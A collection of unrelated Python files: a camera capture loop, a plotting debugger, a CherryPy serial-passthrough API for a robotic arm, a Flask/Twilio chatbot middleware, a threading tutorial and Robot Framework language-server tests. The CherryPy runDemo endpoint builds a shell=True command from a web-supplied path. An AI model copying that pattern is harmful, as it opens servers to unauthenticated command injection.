t = Thread(target=worker, args=(input_q, output_q))
t.daemon = True
t.start()
cam = xiapi.Camera()
print('Opening first camera...')
cam.open_device()
cam.set_exposure(1000)
cam.set_param('width',128)
cam.set_param('height',128)
cam.set_param('downsampling_type', 'XI_SKIPPING')
cam.set_acq_timing_mode('XI_ACQ_TIMING_MODE_FREE_RUN')
img = xiapi.Image()
print('Starting data acquisition...')
cam.start_acquisition()
fps = FPS().start()
frame_count = 0
while True and frame_count< 10000:
frame_count += 1
cam.get_image(img)
# data_raw = img.get_image_data_raw()
frame = 20*img.get_image_data_numpy()
# frame = video_capture.read()
if frame_count % qu_limit == 0:
input_q.put(frame)
if output_q.empty():
pass # fill up queue
# else:
# cv2.imshow('Video', frame)
# if frame_count % 500 ==0 :
# print('[INFO] Live . FPS: {:.2f}'.format(fps.fps()))
fps.update()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
cam.stop_acquisition()
print("Max camera framerate :",cam.get_param('framerate:max'))
cam.close_device()
cv2.destroyAllWindows()
|
BotDebugger.py
|
import numpy as np
import matplotlib.pyplot as mpl
from threading import Thread
import time
import traceback
import Const
def CF(pct):
if pct == Const.PL_C:
return 'y'
if pct == Const.PL_O:
return 'b'
if pct == 'E':
return 'r'
if pct == -1:
return 'k'
return 'g'
class BotDebugger:
def __init__(self, B):
self.ax = None
self.sct = None #Debug: Scatter plot for displaying grid
self.lf = False #Loop flag
self.B = B #The bot to debug
def DisplayPred(self):
for i in range(self.B.ts.m):
for j in range(self.B.ts.n):
rv = self.B.ts.CellLookup((i, j))
if rv is None:
rv = 'N'
print('{:4s}'.format(rv), end = '')
print('')
def PlotMap(self):
mm = self.B.mm
cp = mm.GetPosition()
if self.B.p is not None:
ppx = [self.B.p[0], cp[0]]
ppy = [self.B.p[1], cp[1]]
else:
ppx, ppy = [cp[0]], [cp[1]]
pc = ['r', 'g']
C, CC = [], []
for qp in mm.GetCells():
C.append(qp[0:2])
CC.append(mm.GetCellType(qp))
C = np.stack(C)
if self.sct is None:
mpl.ion()
fig, self.ax = mpl.subplots()
fig.canvas.manager.window.setGeometry(840, 5, 640, 545)
self.sct = 1
else:
self.ax.clear()
self.ax.scatter(C[:, 0], C[:, 1], color = [CF(j) for j in CC])
self.ax.scatter(ppx, ppy, c = pc, s = 64)
self.ax.scatter([mm.hp[0]], [mm.hp[1]], color = 'm', s = 64)
self.ax.set_title("At: " + str(cp))
mpl.pause(0.1)
def PlotLoopT(self):
while self.lf:
try:
self.PlotMap()
except:
traceback.print_exc()
time.sleep(0.5)
def PlotLoop(self):
self.lf = True
thrd = Thread(target = self.PlotLoopT)
thrd.start()
def PlotStop(self):
self.lf = False
|
main.py
|
#NAME: main.py
#DATE: Tuesday 6th August 2019
#AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast
#DESC: A python script for running a CherryPy API as a serial passthrough
#COPY: Copyright 2019, All Rights Reserved, Ryan McCartney
import subprocess
import threading
import cherrypy
import signal
import serial
import time
import json
import os
cofigFilePath = "http_api/settings.json"
#define threading wrapper
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
try:
class API(object):
def __init__(self,configFilePath):
self.loadConfig(cofigFilePath)
#Initiialise other Variables
self.headers = ["Timestamp","Info","Joint 0","Joint 1","Joint 2","Joint 3","Joint 4","Joint 5"]
self.serialMonitorData = ["-,-,-,-,-,-,-,-"]*self.serialMonitorLines
self.connected = False
self.latestMessage = ""
self.previousMessage = ""
self.indexPrepared = False
self.processes = []
#Update Server Port
cherrypy.config.update(
{'server.socket_host': '0.0.0.0',
'server.socket_port': self.serverPort}
)
#On startup try to connect to serial
self.connect()
time.sleep(3)
self.runDemo(self.xboxControlPath)
def loadConfig(self,configFilePath):
with open(configFilePath) as configFile:
config = json.load(configFile)
self.serverName = config["serverName"]
self.serverPort = config["serverPort"]
self.serialPort = config["serialPort"]
self.baudrate = config["baudrate"]
self.serialMonitorLines = config["serialMonitorLines"]
self.hostname = config["hostname"]
self.xboxControlPath = config["xboxScript"]
@cherrypy.expose
def index(self):
if not self.indexPrepared:
self.prepareIndex()
with open ("http_api/index.html", "r") as webPage:
contents=webPage.readlines()
return contents
def prepareIndex(self):
contents = ""
with open("http_api/baseIndex.html", "rt") as webPageIn:
for line in webPageIn:
contents += line.replace('SERVERNAMEFEILD',self.serverName)
with open("http_api/index.html", "wt") as webPageOut:
webPageOut.write(contents)
self.indexPrepared = True
@cherrypy.expose
def demos(self):
with open ("http_api/demo.html", "r") as webPage:
contents=webPage.readlines()
return contents
@cherrypy.expose
def runDemo(self,demoPath):
try:
self.stopDemos()
cwd = os.getcwd()
fullPath = cwd+demoPath
command = "exec python3 "+fullPath
p = subprocess.Popen(command,stdout=subprocess.PIPE, shell=True)
time.sleep(2)
self.processes.append(p)
status = "Successfully Running Demo from '"+str(demoPath)+"' with PID: "+str(p.pid)+"."
except:
status = "Failed to run '"+str(demoPath)+"'."
print(status)
return status
@cherrypy.expose
def stopDemos(self):
status = "Successfully Terminated Demos."
try:
while self.processes:
p = self.processes.pop()
p.kill()
time.sleep(1)
status = "INFO: Terminated Process "+str(p.pid)+"."
print(status)
except:
status = "Failed to terminate demo scripts."
print(status)
return status
@cherrypy.expose
def clearLogs(self):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
#Clear Transmit Log
log = open("http_api/public/transmitLog.csv","w")
log.write("Date and Time,Command String Passed\n")
log.close()
#Clear Receive Log
log = open("http_api/public/receiveLog.csv","w")
log.write("Date and Time,Robotic Arm Response\n")
log.close()
#Clear serial monitor
self.serialMonitorData = ["-,-,-,-,-,-,-,-"]*self.serialMonitorLines
#Return Message
status = currentDateTime + " - INFO: Transmit and Receive Logs have been cleared."
print(status)
return status
@cherrypy.expose
def send(self,command="this"):
#Get Current Date and Time for Logging
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
if not self.connected:
status = self.connect()
try:
#Add command to transmit log
with open ("http_api/public/transmitLog.csv", "a+") as log:
log.write(currentDateTime+","+command+"\n")
#Write Command Passed to Serial Port
payload = (command+'\n').encode('ascii')
self.serial.write(payload)
time.sleep(0.008)
status = currentDateTime + " - INFO: '" + command + "' sent succesfully."
except:
status = currentDateTime + " - ERROR: Could not send '"+ command +"' to serial port. Check connection."
self.connected = False
print(status)
return status
@threaded
def receive(self):
#Initialise array to store data serial monitor data
self.serialMonitorData = ["-,-"]*self.serialMonitorLines
while self.connected == True:
#Get Current Date and Time for Logging
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
#Read Response if Avalible
response = "VOID"
try:
if self.serial.in_waiting > 0:
response = self.serial.readline().decode('utf-8')
response = response.strip()
logLine = currentDateTime+","+str(response)
self.latestMessage = response
#Add response to receive log
with open ("http_api/public/receiveLog.csv", "a+") as log:
log.write(logLine+"\n")
#Add received data to serial monitor array
self.serialMonitorData.pop(0)
self.serialMonitorData.append(logLine)
#print(logLine)
if self.serial.in_waiting > 200:
self.serial.reset_input_buffer()
dump = self.serial.readline().decode('utf-8')
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
status = currentDateTime + " - ERROR: Buffer full dumping '"+str(dump)+"'."
#print(status)
except:
self.connected = False
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
status = currentDateTime + " - ERROR: Cannot read serial line."
print(status)
@cherrypy.expose
def serialMonitor(self):
#Add Correct number of Headers
table = "<table><tr>"
for header in self.headers:
table += "<th>"+header+"</th>"
table += "</tr>"
#Get table contents
rows = len(self.serialMonitorData)-1
for i in range(rows,0,-1):
row = self.serialMonitorData[i]
table += "<tr><td width='20%'>"
table += row.replace(",", "</td><td width='10%'>",len(self.headers))
if row.count(',') < len(self.headers):
for i in range(row.count(','),len(self.headers)-1):
table += "</td><td width='10%'>"
table += "</td></tr>"
table +="</table>"
return table
@cherrypy.expose
def getLast(self):
return self.latestMessage
@cherrypy.expose
def getLatest(self):
if self.previousMessage == self.latestMessage:
message = ""
else:
message = self.latestMessage
self.previousMessage = self.latestMessage
return message
@cherrypy.expose
def connect(self):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
status = currentDateTime + " - INFO: Motor control box arduino already connected."
if not self.connected:
try:
#Open Serial Connection
self.serial = serial.Serial(
port= self.serialPort,
baudrate=self.baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
)
time.sleep(1)
self.connected = True
self.receive()
status = "INFO: Motor control box connected to "+self.serial.name+"."
except:
status = "ERROR: Could not establish a connection with motor control box."
print(status)
return status
@cherrypy.expose
def disconnect(self):
status = "INFO: Motor control box is not connected."
if self.connected:
self.serial.close()
self.connected = False
status = "INFO: Motor control box disconnected."
print(status)
return status
@cherrypy.expose
def getImage(self):
image = "NOT YET OPERATIONAL"
return image
if __name__ == '__main__':
cherrypy.config.update(
{'server.socket_host': '0.0.0.0'}
)
cherrypy.quickstart(API(cofigFilePath), '/',
{
'favicon.ico':
{
'tools.staticfile.on': True,
'tools.staticfile.filename': os.path.join(os.getcwd(),'http_api/public/favicon.ico')
},
'/public': {
'tools.staticdir.on' : True,
'tools.staticdir.dir' : os.path.join(os.getcwd(),'http_api/public'),
'tools.staticdir.index' : 'index.html',
'tools.gzip.on' : True
}
}
)
except:
print("ERROR: Main sequence error.")
|
run.py
|
from flask import Flask, request, jsonify
from flask_mqtt import Mqtt
from twilio.twiml.messaging_response import MessagingResponse
import json
import twilio_messaging as messaging
import chatbot
import db
import connect
import visual_recognition as vr
import nlp
import os
import sparrow_handler as sparrow
from time import sleep
from threading import Thread
import paho.mqtt.publish as publish
with open('config.json') as config_file:
config = json.load(config_file)
app = Flask(__name__)
app.config['MQTT_BROKER_URL'] = config["mqtt"]["broker"]
app.config['MQTT_BROKER_PORT'] = config["mqtt"]["port"]
app.config['MQTT_REFRESH_TIME'] = 1.0 # refresh time in seconds
# app.config['MQTT_USERNAME'] = 'user'
# app.config['MQTT_PASSWORD'] = 'secret'
mqtt = Mqtt(app)
mqttPublishBroker=config["mqtt"]["broker"]
mqttPublishPort=config["mqtt"]["port"]
flag_connected = 0
cf_port = os.getenv("PORT")
@app.route('/')
def route():
return "chirrup chirrup....You have reached Sparrow API"
@app.route("/middleware/receive", methods=['GET', 'POST'])
def listen_input():
message = request.values.get('Body', None)
from_no = request.values.get('From', None)
print(message, from_no)
#Handling Media content
num_media = int(request.values.get("NumMedia"))
if num_media > 0:
media_url = request.values.get(f'MediaUrl0')
mime_type = request.values.get(f'MediaContentType0')
print(media_url, mime_type)
if num_media > 1:
messaging.send_message(from_no, "Multiple media cannot be sent. Sending only first media")
#Handling @sparrow commands
if sparrow.is_sparrow_request(message):
t = Thread(target=sparrow.handle_sparrow_request, args=(from_no, message,))
t.start()
# sparrow.handle_sparrow_request(from_no, message)
return str(MessagingResponse())
receiver = db.getReceiver(from_no)
if receiver == db.IBM_RECEIVER:
if sparrow.is_command(message):
t = Thread(target=sparrow.handle_command, args=(from_no, message))
t.start()
return str(MessagingResponse())
elif num_media > 0:
reply = "Sorry! Our Automated chatbot doesn't support Media at this point."
elif message == "":
reply = "Invalid format. Your message is empty!"
else:
replies = chatbot.handle_message(from_no, message)
if len(replies) > 1:
t = Thread(target=messaging.send_messages, args=(from_no, replies))
t.start()
return(str(MessagingResponse()))
else:
reply = replies[0]
resp = MessagingResponse()
resp.message(reply)
return str(resp)
else:
if num_media > 0:
messaging.send_message_with_media(from_no, receiver, message, media_url, mime_type)
elif message == "":
messaging.send_message(from_no, "Invalid message. Can't be sent")
else:
messaging.send_message(receiver, message)
return str(MessagingResponse())
@app.route("/middleware/connect_expert", methods=['GET', 'POST'])
def connectExpert():
sessionID = request.values.get('sessionID', None)
type = request.values.get('type', None)
userID = db.getUserID(sessionID)
if userID:
expert = connect.connect_expert(userID, type)
return str(expert)
return str("Invalid Session")
@app.route("/middleware/send_message", methods=['GET', 'POST'])
def sendMessage():
userID = request.values.get('userID', None)
message = request.values.get('message', None)
expert = messaging.send_message(userID, message)
return str("Success")
@mqtt.on_connect()
def handle_connect(client, userdata, flags, rc):
mqtt.unsubscribe_all()
mqtt.subscribe('sparrow_receive/+')
@mqtt.on_message()
def handle_mqtt_message(client, userdata, message):
data = dict(
topic=message.topic,
payload=message.payload.decode()
)
# print(data)
message = data["payload"]
from_no = data["topic"].split("/")[1]
print(message, from_no)
if sparrow.is_sparrow_request(message):
sparrow.handle_sparrow_request(from_no, message)
return
receiver = db.getReceiver(from_no)
print(receiver)
if receiver == db.IBM_RECEIVER:
if sparrow.is_command(message):
sparrow.handle_command(from_no, message)
return
reply = chatbot.handle_message(from_no, message)
for message in reply:
mqtt.publish(data["topic"].replace("receive", "response"), message)
sleep(2)
return
else:
messaging.send_message(receiver, message)
return
@app.route("/visual_recognition/text", methods=['POST'])
def recognize_text():
image_url = request.values.get('image_url', None)
# print(image_url)
text = vr.get_text_from_image(image_url)
#return jsonify({'text':text})
return text
@app.route("/nlp/sentiment", methods=['POST'])
def sentiment_of_text():
text = request.values.get('text', None)
sentiment = nlp.get_sentiment_emotions(text)
#return jsonify({'text':text})
return jsonify(sentiment)
@app.route("/nlp/entities", methods=['POST'])
def entities_of_text():
text = request.values.get('text', None)
entities = nlp.get_entities(text)
#return jsonify({'text':text})
return jsonify(entities)
if __name__ == "__main__":
if cf_port is None:
app.run(host='0.0.0.0', port=5000, debug=False)
else:
app.run(host='0.0.0.0', port=int(cf_port), debug=False)
|
192-01-queue.py
|
import logging
import queue
import threading
logging.basicConfig(level=logging.DEBUG, format="%(threadName)s: %(message)s")
def worker1(queue):
logging.debug("start")
while True:
item = queue.get()
if item is None:
break
logging.debug(item)
queue.task_done()
logging.debug("longggggggggggggggggggggg")
logging.debug("end")
if __name__ == "__main__":
# queue.Queue 만 써도 이에 대한 락 처리 등이 자동으로 된다
queue = queue.Queue()
# 큐에 더미데이터 생성
for i in range(10):
queue.put(i)
# worker1 함수를 쓰레드로 실행하고 인수로 여기에서 생성한 queue를 전달
t1 = threading.Thread(target=worker1, args=(queue,))
t1.start()
logging.debug("tasks are not done")
# 큐가 비워지지 않으면 queue join 이 완료되지 않음. task_done()으로 get 작업이 완료되었음을 표시해줘야 join()이 완료됨
queue.join()
logging.debug("tasks are done")
# queue join() 은 완료되었지만 worker1의 while 문이 종료되지 않아 그 다음으로 진행하지 못하고 있다. break 조건인 None 을 넣어줘야 t1 쓰레드가 종료문까지 진행 가능
queue.put(None)
# t1 쓰레드가 종료되기를 기다림
t1.join()
|
test_vscode_robot.py
|
import logging
import os
from pathlib import Path
import threading
import pytest
from robocorp_ls_core.protocols import ILanguageServerClient
from robocorp_ls_core.unittest_tools.cases_fixture import CasesFixture
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_STOP
from robotframework_ls.impl.robot_lsp_constants import (
OPTION_ROBOT_CODE_FORMATTER_ROBOTIDY,
OPTION_ROBOT_CODE_FORMATTER_BUILTIN_TIDY,
)
from robocorp_ls_core.lsp import MarkupKind
log = logging.getLogger(__name__)
def check_diagnostics(language_server, data_regression):
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robotframework_ls_tests.fixtures import sort_diagnostics
uri = "untitled:Untitled-1.resource"
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(uri, 1)
assert message_matcher.event.wait(TIMEOUT)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.change_doc(uri, 2, "*** Invalid Invalid ***")
assert message_matcher.event.wait(TIMEOUT)
diag = message_matcher.msg["params"]["diagnostics"]
data_regression.check(sort_diagnostics(diag), basename="diagnostics")
def check_find_definition_data_regression(data_regression, check, basename=None):
check["targetUri"] = os.path.basename(check["targetUri"])
data_regression.check(check, basename=basename)
def test_diagnostics(language_server, ws_root_path, data_regression):
language_server.initialize(ws_root_path, process_id=os.getpid())
import robot
env = {
"PYTHONPATH": os.path.dirname(os.path.dirname(os.path.abspath(robot.__file__)))
}
language_server.settings(
{"settings": {"robot.python.env": env, "robot.lint.robocop.enabled": True}}
)
check_diagnostics(language_server, data_regression)
def test_diagnostics_robocop(language_server, ws_root_path, data_regression):
from robotframework_ls_tests.fixtures import sort_diagnostics
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
language_server.initialize(ws_root_path, process_id=os.getpid())
language_server.settings({"settings": {"robot.lint.robocop.enabled": True}})
uri = "untitled:Untitled-1"
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(uri, 1)
assert message_matcher.event.wait(TIMEOUT)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.change_doc(
uri,
2,
"""
*** Test Cases ***
Test
Fail
Test
Fail
""",
)
assert message_matcher.event.wait(TIMEOUT)
diag = message_matcher.msg["params"]["diagnostics"]
data_regression.check(sort_diagnostics(diag), basename="test_diagnostics_robocop")
def test_diagnostics_robocop_configuration_file(
language_server, ws_root_path, data_regression
):
from robotframework_ls_tests.fixtures import sort_diagnostics
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robocorp_ls_core import uris
language_server.initialize(ws_root_path, process_id=os.getpid())
language_server.settings({"settings": {"robot.lint.robocop.enabled": True}})
src = os.path.join(ws_root_path, "my", "src")
os.makedirs(src)
target_robot = os.path.join(src, "target.robot")
config_file = os.path.join(ws_root_path, "my", ".robocop")
with open(config_file, "w") as stream:
stream.write(
"""
--exclude missing-doc-test-case
--include missing-doc-suite
"""
)
uri = uris.from_fs_path(target_robot)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(
uri,
1,
text="""
*** Test Cases ***
Test
Fail
""",
)
assert message_matcher.event.wait(TIMEOUT)
diag = message_matcher.msg["params"]["diagnostics"]
data_regression.check(
sort_diagnostics(diag), basename="test_diagnostics_robocop_configuration_file"
)
def test_section_completions_integrated(language_server, ws_root_path, data_regression):
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
language_server.change_doc(uri, 2, "*settin")
def check(expected):
completions = language_server.get_completions(uri, 0, 7)
del completions["id"]
data_regression.check(completions, expected)
check("completion_settings_plural")
language_server.settings(
{
"settings": {
"robot": {"completions": {"section_headers": {"form": "singular"}}}
}
}
)
check("completion_settings_singular")
language_server.settings(
{"settings": {"robot": {"completions": {"section_headers": {"form": "both"}}}}}
)
check("completion_settings_both")
language_server.settings(
{
"settings": {
"robot": {"completions": {"section_headers": {"form": "plural"}}}
}
}
)
check("completion_settings_plural")
def test_keyword_completions_integrated_pythonpath_resource(
language_server_tcp, ws_root_path, data_regression, cases
):
from robocorp_ls_core.workspace import Document
case4_path = cases.get_path("case4")
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Settings ***
Resource case4resource.txt
*** Test Cases ***
Check It
Yet Another Equ"""
language_server.change_doc(uri, 2, contents)
language_server_tcp.settings({"settings": {"robot": {"pythonpath": [case4_path]}}})
def request_completion():
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
return completions
data_regression.check(request_completion())
# Removing should no longer find it.
language_server_tcp.settings({"settings": {"robot": {"pythonpath": []}}})
data_regression.check(request_completion(), basename="no_entries")
def test_keyword_completions_integrated_pythonpath_library(
language_server_tcp: ILanguageServerClient, ws_root_path, data_regression, cases
):
from robocorp_ls_core.workspace import Document
case1_path = cases.get_path("case1")
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Settings ***
Library case1_library
*** Test Cases ***
Check It
Verify Mod"""
language_server.change_doc(uri, 2, contents)
language_server_tcp.settings({"settings": {"robot": {"pythonpath": [case1_path]}}})
def request_completion():
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
return completions
data_regression.check(request_completion())
# Note: for libraries, if we found it, we keep it in memory (so, even though
# we removed the entry, it'll still be accessible).
language_server_tcp.settings({"settings": {"robot": {"pythonpath": []}}})
data_regression.check(request_completion())
def test_completions_after_library(
language_server_tcp: ILanguageServerClient, ws_root_path, data_regression, cases
):
from robocorp_ls_core.workspace import Document
case1_path = cases.get_path("case1")
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Settings ***
Library """
language_server.change_doc(uri, 2, contents)
language_server_tcp.settings({"settings": {"robot": {"pythonpath": [case1_path]}}})
def request_completion():
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
return completions
assert not request_completion()["result"]
def test_keyword_completions_prefer_local_library_import(
language_server_tcp: ILanguageServerClient, ws_root_path, data_regression, cases
):
from robocorp_ls_core.workspace import Document
from robocorp_ls_core import uris
try:
os.makedirs(ws_root_path)
except:
pass
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
case1_robot_path = cases.get_path("case1/case1.robot")
contents = """
*** Settings ***
Library case1_library
*** Test Cases ***
User can call library
verify model 1
verify_another_mod"""
uri = uris.from_fs_path(case1_robot_path)
language_server.open_doc(uri, 1, text=contents)
def request_completion():
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
return completions
data_regression.check(request_completion())
def test_variables_completions_integrated(
language_server_tcp: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Variables ***
${NAME} Robot Framework
${VERSION} 2.0
${ROBOT} ${NAME} ${VERSION}
*** Test Cases ***
List Variable
Log ${NAME}
Should Contain ${"""
language_server.change_doc(uri, 2, contents)
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
data_regression.check(completions, "variable_completions")
# Note: for libraries, if we found it, we keep it in memory (so, even though
# we removed the entry, it'll still be accessible).
language_server_tcp.settings({"settings": {"robot": {"variables": {"myvar1": 10}}}})
completions = language_server.get_completions(uri, line, col)
labels = [x["label"] for x in completions["result"]]
assert "${myvar1}" in labels
def test_variables_resolved_on_completion_integrated(
language_server_tcp: ILanguageServerClient, workspace_dir, data_regression, cases
):
from robocorp_ls_core.workspace import Document
language_server = language_server_tcp
language_server.initialize(workspace_dir, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """*** Settings ***
Library ${ROOT}/directory/my_library.py
*** Keywords ***
Some Keyword
In Lib"""
language_server.change_doc(uri, 2, contents)
# Note: for libraries, if we found it, we keep it in memory (so, even though
# we removed the entry, it'll still be accessible).
language_server_tcp.settings(
{
"settings": {
"robot": {"variables": {"ROOT": cases.get_path("case_same_basename")}}
}
}
)
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
data_regression.check(completions)
def test_env_variables_resolved_on_completion_integrated(
language_server_tcp: ILanguageServerClient, workspace_dir, data_regression, cases
):
from robocorp_ls_core.workspace import Document
language_server = language_server_tcp
language_server.initialize(workspace_dir, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """*** Settings ***
Library %{ROOT}/directory/my_library.py
*** Keywords ***
Some Keyword
In Lib"""
language_server.change_doc(uri, 2, contents)
# Note: for libraries, if we found it, we keep it in memory (so, even though
# we removed the entry, it'll still be accessible).
language_server_tcp.settings(
{
"settings": {
"robot": {
"python": {"env": {"ROOT": cases.get_path("case_same_basename")}}
}
}
}
)
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
data_regression.check(completions)
contents = """*** Settings ***
Library %{ROOT}/directory/my_library.py
*** Keywords ***
Some Keyword
In Lib 2"""
language_server.change_doc(uri, 2, contents)
definitions = language_server.find_definitions(uri, line, col)
found = definitions["result"]
assert len(found) == 1
assert found[0]["targetUri"].endswith("my_library.py")
def test_snippets_completions_integrated(
language_server_tcp, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Test Cases ***
List Variable
for in"""
language_server.change_doc(uri, 2, contents)
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
data_regression.check(completions, "snippet_completions")
def test_restart_when_api_dies(language_server_tcp, ws_root_path, data_regression):
from robocorp_ls_core.basic import kill_process_and_subprocesses
from robocorp_ls_core import basic
from robotframework_ls.server_manager import _ServerApi
import time
# Check just with language_server_tcp as it's easier to kill the subprocess.
server_apis = set()
server_processes = set()
def on_get_robotframework_api_client(server_api):
if (
server_api.robot_framework_language_server
is language_server_tcp.language_server_instance
):
server_apis.add(server_api)
server_processes.add(server_api._server_process.pid)
with basic.after(
_ServerApi, "get_robotframework_api_client", on_get_robotframework_api_client
):
language_server_tcp.initialize(ws_root_path, process_id=os.getpid())
import robot
env = {
"PYTHONPATH": os.path.dirname(
os.path.dirname(os.path.abspath(robot.__file__))
)
}
language_server_tcp.settings(
{"settings": {"robot.python.env": env, "robot.lint.robocop.enabled": True}}
)
processes_per_api = 3
check_diagnostics(language_server_tcp, data_regression)
assert len(server_apis) == processes_per_api
assert len(server_processes) == processes_per_api
check_diagnostics(language_server_tcp, data_regression)
assert len(server_apis) == processes_per_api
assert len(server_processes) == processes_per_api
log.info("Killing server api process.")
for pid in server_processes:
kill_process_and_subprocesses(pid)
# Just make sure the connection is properly dropped before re-requesting.
time.sleep(0.2)
check_diagnostics(language_server_tcp, data_regression)
assert len(server_processes) == processes_per_api * 2
assert len(server_apis) == processes_per_api
def test_missing_message(language_server, ws_root_path):
language_server.initialize(ws_root_path)
# Just ignore this one (it's not a request because it has no id).
language_server.write(
{
"jsonrpc": "2.0",
"method": "invalidMessageSent",
"params": {"textDocument": {"uri": "untitled:Untitled-1", "version": 2}},
}
)
# Make sure that we have a response if it's a request (i.e.: it has an id).
msg = language_server.request(
{
"jsonrpc": "2.0",
"id": "22",
"method": "invalidMessageSent",
"params": {"textDocument": {"uri": "untitled:Untitled-1", "version": 2}},
}
)
assert msg["error"]["code"] == -32601
def test_exit_with_parent_process_died(
language_server_process, language_server_io, ws_root_path
):
"""
:note: Only check with the language_server_io (because that's in another process).
"""
from robocorp_ls_core.subprocess_wrapper import subprocess
import sys
from robocorp_ls_core.basic import is_process_alive
from robocorp_ls_core.basic import kill_process_and_subprocesses
from robocorp_ls_core.unittest_tools.fixtures import wait_for_test_condition
language_server = language_server_io
dummy_process = subprocess.Popen(
[sys.executable, "-c", "import time;time.sleep(10000)"]
)
language_server.initialize(ws_root_path, process_id=dummy_process.pid)
assert is_process_alive(dummy_process.pid)
assert is_process_alive(language_server_process.pid)
kill_process_and_subprocesses(dummy_process.pid)
wait_for_test_condition(lambda: not is_process_alive(dummy_process.pid))
wait_for_test_condition(lambda: not is_process_alive(language_server_process.pid))
language_server_io.require_exit_messages = False
@pytest.mark.parametrize(
"formatter",
[OPTION_ROBOT_CODE_FORMATTER_ROBOTIDY, OPTION_ROBOT_CODE_FORMATTER_BUILTIN_TIDY],
)
def test_code_format_integrated(
language_server, ws_root_path, data_regression, formatter
):
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
language_server.settings({"settings": {"robot.codeFormatter": formatter}})
language_server.change_doc(uri, 2, "***settings***\nDocumentation Some doc")
ret = language_server.request_source_format(uri)
from robot import get_version
version = get_version(naked=True).split(".")[0]
if version == "5":
if formatter == OPTION_ROBOT_CODE_FORMATTER_BUILTIN_TIDY:
try:
from robot.tidy import Tidy
except ImportError:
pytest.skip("robot.tidy is no longer available.")
version = "4"
basename = "test_code_format_integrated_text_edits_" + formatter
if formatter == OPTION_ROBOT_CODE_FORMATTER_ROBOTIDY:
basename += "_" + version
data_regression.check(
ret,
basename=basename,
)
language_server.change_doc(uri, 3, "[Documentation]\n")
ret = language_server.request_source_format(uri)
assert ret["result"] == []
def test_find_definition_integrated_library(
language_server: ILanguageServerClient, cases, workspace_dir, data_regression
):
from robocorp_ls_core import uris
cases.copy_to("case1", workspace_dir)
language_server.initialize(workspace_dir, process_id=os.getpid())
case1_robot = os.path.join(workspace_dir, "case1.robot")
assert os.path.exists(case1_robot)
uri = uris.from_fs_path(case1_robot)
language_server.open_doc(uri, 1, text=None)
ret = language_server.find_definitions(uri, 5, 6)
result = ret["result"]
assert len(result) == 1
check = next(iter(result))
check_find_definition_data_regression(
data_regression, check, basename="test_find_definition_integrated_library"
)
def test_find_definition_keywords(
language_server: ILanguageServerClient, cases, workspace_dir, data_regression
):
from robocorp_ls_core import uris
cases.copy_to("case2", workspace_dir)
language_server.initialize(workspace_dir, process_id=os.getpid())
case2_robot = os.path.join(workspace_dir, "case2.robot")
assert os.path.exists(case2_robot)
uri = uris.from_fs_path(case2_robot)
language_server.open_doc(uri, 1, text=None)
ret = language_server.find_definitions(uri, 7, 6)
result = ret["result"]
assert len(result) == 1
